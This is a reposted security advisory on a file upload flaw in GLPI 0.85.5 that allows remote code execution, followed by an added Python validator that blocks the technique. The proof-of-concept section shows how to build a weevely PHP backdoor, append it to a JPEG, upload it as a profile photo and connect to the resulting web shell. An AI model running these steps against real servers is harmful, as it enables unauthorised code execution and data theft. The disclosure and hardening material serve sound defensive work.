GLPI 0.85.5 Remote Code Execution / File Upload

07 Oct 2015 | Reported by Raffaele Forte | Type: packetstorm | Source: packetstormsecurity.com

GLPI 0.85.5 RCE through file upload filter bypass, allowing attackers to execute arbitrary code on the server.

Code

```text
# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <[email protected]>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3


I. INTRODUCTION
========================================================================

GLPI is the Information Resource-Manager with an additional
Administration-Interface. You can use it to build up a database with an
inventory for your company (computers, software, printers...). It has
enhanced functions to make the daily life of administrators easier,
like a job-tracking system with mail notification and methods to build a
database with basic information about your network topology.


II. DESCRIPTION
========================================================================

The application allows users to update their own profile. The user has
the possibility to add a new photo as an attachment.

The uploaded photo is stored in "GLPI_ROOT/files/_pictures/".

This file, for example named "photo.jpeg", is directly accessible
at "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"
is an ID automatically generated by the system and visible in the HTML
source code.

Furthermore, the server does not check the extension of the uploaded file,
only its first bytes, which indicate what kind of file it is.

Exploiting this flaw, an attacker may upload a tampered JPEG file that
contains PHP code placed at the end of the file, so that, just by changing
the file extension to ".php", the PHP code is interpreted by default!

To trigger this vulnerability it is necessary to have an account.

This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images


III. PROOF OF CONCEPT
========================================================================

Generate backdoor:

user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php

Upload the new tampered photo in GLPI > Settings

Run terminal to the target:

user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123


IV. BUSINESS IMPACT
========================================================================
By uploading an interpretable PHP file, an attacker may be able to
execute arbitrary code on the server.

This flaw may compromise the integrity of the system and/or expose
sensitive information.


V. SYSTEMS AFFECTED
========================================================================
GLPI Version 0.85.5 is vulnerable (probably all previous versions)


VI. VULNERABILITY HISTORY
========================================================================
September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification


VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
```
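Section II of the advisory names two root causes: predictable file names under a web-served directory, and a content check that looks only at the leading bytes. The following Python is an added example (not GLPI's code and not part of the advisory) showing how an upload handler can close both at once: it requires the extension to be on an allowlist, requires the file signature to match that extension, rejects data appended after the JPEG end-of-image marker, refuses anything containing a server-side code marker, and stores the result under a random server-chosen name. The accepted types (JPEG, PNG), the `(filename, bytes)` calling convention and the sample inputs are assumptions constructed for this example.

```python
"""
Added example (not GLPI's code, not part of the advisory): a hardened
profile-picture upload check addressing both issues the advisory names.

Assumptions (constructed for this example): accepted types are JPEG and
PNG; the upload arrives as (filename, bytes); storage names are chosen
server-side and never derived from user input or a guessable ID.
"""
import os
import re
import secrets

# File signatures (magic bytes) for the image types we accept.
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# Extension allowlist, mapped to the signature family it must match.
ALLOWED_EXTENSIONS = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}

# Tokens that would let a web server or PHP interpreter treat the bytes as code.
CODE_MARKERS = re.compile(rb"<\?php|<\?=|<script\b", re.IGNORECASE)


def extension_type(filename: str):
    """Return the image type implied by the extension, or None if not allowed."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ALLOWED_EXTENSIONS.get(ext)


def signature_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for kind, sigs in SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    return None


def jpeg_trailing_bytes(data: bytes) -> int:
    """Number of bytes after the JPEG End-Of-Image marker (0xFFD9).

    A well-formed JPEG ends at EOI, so anything appended after it (the
    advisory's "php code placed at the end of the file") shows up here.
    This is a heuristic: re-encoding the image with an image library is
    the robust way to discard foreign bytes.
    """
    eoi = data.rfind(b"\xff\xd9")
    if eoi == -1:
        return len(data)  # no EOI at all: treat the whole file as suspect
    return len(data) - (eoi + 2)


def validate_upload(filename: str, data: bytes):
    """Return (ok, reason). Every check must pass; the weakest link decides."""
    ext_kind = extension_type(filename)
    if ext_kind is None:
        return False, "extension not in allowlist"
    sig_kind = signature_type(data)
    if sig_kind is None:
        return False, "leading bytes are not an accepted image signature"
    if sig_kind != ext_kind:
        return False, "extension and file signature disagree"
    if sig_kind == "jpeg" and jpeg_trailing_bytes(data) > 0:
        return False, "data appended after JPEG end-of-image marker"
    if CODE_MARKERS.search(data):
        return False, "embedded code marker found"
    return True, "ok"


def storage_name(kind: str) -> str:
    """Unguessable, server-chosen filename with a fixed image extension.

    Unlike a sequential ID exposed in HTML source, a 128-bit random token
    cannot be predicted, and the extension is never taken from the client.
    """
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed sample inputs: a minimal JPEG-like byte string (SOI ... EOI)
# and the same bytes with a harmless PHP marker appended, mirroring the
# advisory's "cat bd.php >> photo.jpeg" step.
CLEAN_JPEG = (b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00\x01\x02"
              + b"\x00" * 8 + b"\xff\xd9")
TAMPERED = CLEAN_JPEG + b"<?php echo 1; ?>"

if __name__ == "__main__":
    for name, blob in [("photo.jpeg", CLEAN_JPEG), ("photo.php", TAMPERED),
                       ("photo.jpeg", TAMPERED), ("photo.png", CLEAN_JPEG)]:
        ok, reason = validate_upload(name, blob)
        print(f"{name}: {'accept' if ok else 'reject'} ({reason})")
    print("stored as:", storage_name("jpeg"))
```

Run stand-alone, the clean JPEG under a `.jpeg` name is accepted, the same payload renamed to `.php` fails the allowlist, the tampered file kept as `.jpeg` fails the trailing-bytes check, and a JPEG body under a `.png` name fails the signature/extension agreement check. In a real deployment the random name should also live in a directory the web server is configured not to execute scripts from, so that a missed case in the content checks still cannot be reached as code.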
